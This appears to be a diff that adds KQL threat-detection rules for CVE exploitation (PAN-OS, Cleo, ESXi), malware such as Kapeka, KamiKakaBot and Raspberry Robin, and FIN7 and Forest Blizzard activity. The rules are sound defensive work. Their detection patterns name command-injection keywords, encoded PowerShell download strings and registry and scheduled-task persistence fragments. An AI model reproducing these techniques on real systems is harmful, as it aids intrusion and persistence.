@@ -0,0 +1,13 @@
+// Title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.
+// As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-3400, detection.emerging-threats
+// False Positives:
+//   - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely.
+
+DeviceFileEvents
+| where (FolderPath contains "{IFS}" or FolderPath contains "base64" or FolderPath contains "bash" or FolderPath contains "curl" or FolderPath contains "http") and FolderPath startswith "/opt/panlogs/tmp/device_telemetry/"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql
new file mode 100644
index 00000000..faeeae87
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-35250/potential_cve_2024_35250_exploitation_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential CVE-2024-35250 Exploitation Activity
+// Author: @eyezuhk Isaac Fernandes
+// Date: 2025-02-19
+// Level: medium
+// Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats
+// False Positives:
+//   - Legitimate applications that use Windows Stream Interface APIs.
+//   - Media applications that use DirectShow filters.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ksproxy.ax" and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\app-" and InitiatingProcessFolderPath contains "\\Discord.exe") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Opera\\opera.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
new file mode 100644
index 00000000..de7a844d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-37085/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
@@ -0,0 +1,12 @@
+// Title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group
+// Author: frack113
+// Date: 2024-07-29
+// Level: high
+// Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins".
+// This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.
+// VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-37085, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/add" and ProcessCommandLine contains "/domain" and ProcessCommandLine contains "ESX Admins" and ProcessCommandLine contains "group") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) or ((ProcessCommandLine contains "New-ADGroup" and ProcessCommandLine contains "ESX Admins") and ((FolderPath endswith "\\PowerShell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.exe", "pwsh.dll"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql
new file mode 100644
index 00000000..035dfbf2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-50623/cve_2024_50623_exploitation_attempt_cleo.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2024-50623 Exploitation Attempt - Cleo
+// Author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson
+// Date: 2024-12-09
+// Level: high
+// Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand" or ProcessCommandLine contains ".Download") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine contains "Harmony" or InitiatingProcessCommandLine contains "lexicom" or InitiatingProcessCommandLine contains "VersaLex" or InitiatingProcessCommandLine contains "VLTrader") and InitiatingProcessFolderPath endswith "\\javaw.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql
new file mode 100644
index 00000000..ac7eaece
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/CSharp-Streamer/potential_csharp_streamer_rat_loading_net_executable_image.kql
@@ -0,0 +1,10 @@
+// Title: Potential CSharp Streamer RAT Loading .NET Executable Image
+// Author: Luca Di Bartolomeo
+// Date: 2024-06-22
+// Level: high
+// Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats
+
+DeviceImageLoadEvents
+| where FolderPath matches regex "\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql b/KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
new file mode 100644
index 00000000..75a2994d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
@@ -0,0 +1,12 @@
+// Title: DarkGate - Drop DarkGate Loader In C:\Temp Directory
+// Author: Tomasz Dyduch, Josh Nickels
+// Date: 2024-05-31
+// Level: medium
+// Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+//   - Unlikely legitimate usage of AutoIT in temp folders.
+
+DeviceFileEvents
+| where (FolderPath contains ":\\temp\\" and (FolderPath endswith ".au3" or FolderPath endswith "\\autoit3.exe")) or (InitiatingProcessFolderPath contains ":\\temp\\" and (InitiatingProcessFolderPath endswith ".au3" or InitiatingProcessFolderPath endswith "\\autoit3.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql
new file mode 100644
index 00000000..e28c09b4
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql
@@ -0,0 +1,12 @@
+// Title: File Creation Related To RAT Clients
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-12-19
+// Level: high
+// Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Legitimate software creating a file with the same name
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Roaming\\" and ((FolderPath contains "\\mydata\\" or FolderPath contains "\\datalogs\\" or FolderPath contains "\\hvnc\\" or FolderPath contains "\\dcrat\\") and (FolderPath endswith "\\datalogs.conf" or FolderPath endswith "\\hvnc.conf" or FolderPath endswith "\\dcrat.conf"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql
new file mode 100644
index 00000000..bef6bc6f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql
@@ -0,0 +1,11 @@
+// Title: Potential KamiKakaBot Activity - Lure Document Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-03-22
+// Level: medium
+// Description: Detects the execution of a Word document via the WinWord Start Menu shortcut.
+// This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/c " and ProcessCommandLine contains ".lnk ~" and ProcessCommandLine contains "Start Menu\\Programs\\Word") and ProcessCommandLine endswith ".doc" and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
new file mode 100644
index 00000000..697c24cb
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
@@ -0,0 +1,11 @@
+// Title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-03-22
+// Level: medium
+// Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command.
+// This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "shutdown /l /f" and ProcessCommandLine contains "WEEKLY") and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql
new file mode 100644
index 00000000..768174f9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Potential KamiKakaBot Activity - Winlogon Shell Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior
+// Date: 2024-03-22
+// Level: high
+// Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "-nop -w h" and RegistryValueData contains "$env" and RegistryValueData contains "explorer.exe" and RegistryValueData contains "Start-Process") and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
new file mode 100644
index 00000000..c2c2117e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-12-19
+// Level: high
+// Description: Detects the execution of more.com and vbc.exe in the process tree.
+// This behavior was observed by a set of samples related to Lummac Stealer.
+// The Lummac payload is injected into the vbc.exe process.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\vbc.exe" or ProcessVersionInfoOriginalFileName =~ "vbc.exe") and InitiatingProcessFolderPath endswith "\\more.com"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql
new file mode 100644
index 00000000..19eb8fcc
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql
@@ -0,0 +1,11 @@
+// Title: Potential Raspberry Robin CPL Execution Activity
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-03-07
+// Level: high
+// Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function.
+// This behavior was observed in multiple Raspberry-Robin variants.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".CPL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\control.exe") and ProcessCommandLine contains "\\AppData\\Local\\Temp\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
new file mode 100644
index 00000000..cdbe156e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
@@ -0,0 +1,11 @@
+// Title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-31
+// Level: low
+// Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.
+// Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or InitiatingProcessFolderPath endswith "\\control.exe") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap*") and ((RegistryValueData contains "DWORD (0x00000000)" and RegistryKey endswith "\\AutoDetect") or (RegistryValueData contains "DWORD (0x00000001)" and (RegistryKey endswith "\\IntranetName" or RegistryKey endswith "\\ProxyByPass" or RegistryKey endswith "\\UNCAsIntranet")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql
new file mode 100644
index 00000000..ad21478e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql
@@ -0,0 +1,10 @@
+// Title: Kapeka Backdoor Autorun Persistence
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ":\\WINDOWS\\system32\\rundll32.exe" and RegistryValueData contains ".wll" and RegistryValueData contains "#1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" and (RegistryKey endswith "\\Sens Api" or RegistryKey endswith "\\OneDrive")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql
new file mode 100644
index 00000000..01d34437
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql
@@ -0,0 +1,11 @@
+// Title: Kapeka Backdoor Configuration Persistence
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: medium
+// Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key.
+// The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\{" and RegistryKey endswith "\\Seed") and (not(RegistryValueData contains "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..2b16cf5e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Kapeka Backdoor Execution Via RunDLL32.EXE
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-03
+// Level: high
+// Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local") and ((ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1" and ProcessCommandLine contains " -d") or (ProcessCommandLine contains ".wll" and ProcessCommandLine endswith "#1"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql
new file mode 100644
index 00000000..c6787dd2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql
@@ -0,0 +1,11 @@
+// Title: Kapeka Backdoor Loaded Via Rundll32.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe.
+// The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceImageLoadEvents
+| where (FolderPath contains ":\\ProgramData" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "[a-zA-Z]{5,6}\\.wll" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql
new file mode 100644
index 00000000..a11223a9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql
@@ -0,0 +1,16 @@
+// Title: Kapeka Backdoor Persistence Activity
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects Kapeka backdoor persistence activity.
+// Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).
+// For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM.
+// To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command.
+// Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "create" and ProcessCommandLine contains "ONSTART") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) or ((ProcessCommandLine contains "add" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe"))) and ((ProcessCommandLine contains "Sens Api" or ProcessCommandLine contains "OneDrive") and (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql
new file mode 100644
index 00000000..5115222b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql
@@ -0,0 +1,11 @@
+// Title: Potential Kapeka Decrypted Backdoor Indicator
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges.
+// The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where ((FolderPath contains ":\\ProgramData\\" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "\\\\[a-zA-Z]{5,6}\\.wll") or (FolderPath endswith "\\win32log.exe" or FolderPath endswith "\\crdss.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql
new file mode 100644
index 00000000..ffde7472
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential APT FIN7 Exploitation Activity
+// Author: Alex Walston (@4ayymm)
+// Date: 2024-07-29
+// Level: medium
+// Description: Detects potential APT FIN7 exploitation activity as reported by Google.
+// In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats
+// False Positives:
+//   - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD)
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\notepad++.exe") or (FolderPath endswith "\\notepad++.exe" and InitiatingProcessFolderPath endswith "\\rdpinit.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql
new file mode 100644
index 00000000..e6427e64
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql
@@ -0,0 +1,13 @@
+// Title: Forest Blizzard APT - Custom Protocol Handler Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the setting of a custom protocol handler with the name "rogue".
+// Seen being created by Forest Blizzard APT as reported by MSFT.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}" and RegistryKey contains "\\PROTOCOLS\\Handler\\rogue\\CLSID"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
new file mode 100644
index 00000000..171a3356
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
@@ -0,0 +1,13 @@
+// Title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the setting of the DLL that handles the custom protocol handler.
+// Seen being created by Forest Blizzard APT as reported by MSFT.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData endswith ".dll" and RegistryKey contains "\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql
new file mode 100644
index 00000000..3f7ccead
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql
@@ -0,0 +1,13 @@
+// Title: Forest Blizzard APT - File Creation Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the creation of specific files inside of ProgramData directory.
+// These files were seen being created by Forest Blizzard as described by MSFT.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where ((FolderPath contains "\\prnms003.inf_" or FolderPath contains "\\prnms009.inf_") and (FolderPath startswith "C:\\ProgramData\\Microsoft\\v" or FolderPath startswith "C:\\ProgramData\\Adobe\\v" or FolderPath startswith "C:\\ProgramData\\Comms\\v" or FolderPath startswith "C:\\ProgramData\\Intel\\v" or FolderPath startswith "C:\\ProgramData\\Kaspersky Lab\\v" or FolderPath startswith "C:\\ProgramData\\Bitdefender\\v" or FolderPath startswith "C:\\ProgramData\\ESET\\v" or FolderPath startswith "C:\\ProgramData\\NVIDIA\\v" or FolderPath startswith "C:\\ProgramData\\UbiSoft\\v" or FolderPath startswith "C:\\ProgramData\\Steam\\v")) or (FolderPath startswith "C:\\ProgramData\\" and ((FolderPath endswith ".save" or FolderPath endswith "\\doit.bat" or FolderPath endswith "\\execute.bat" or FolderPath endswith "\\servtask.bat") or (FolderPath contains "\\wayzgoose" and FolderPath endswith ".dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql
